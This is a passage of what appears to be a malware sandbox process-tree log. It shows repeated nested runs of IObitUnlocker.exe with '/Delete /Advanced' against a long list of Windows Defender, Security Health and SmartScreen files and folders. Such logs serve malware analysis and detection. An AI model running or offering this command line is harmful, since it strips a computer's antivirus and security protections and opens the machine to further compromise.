Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8132
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8040
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8104
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7916
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7960
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7244
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7636
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7340
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7176
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 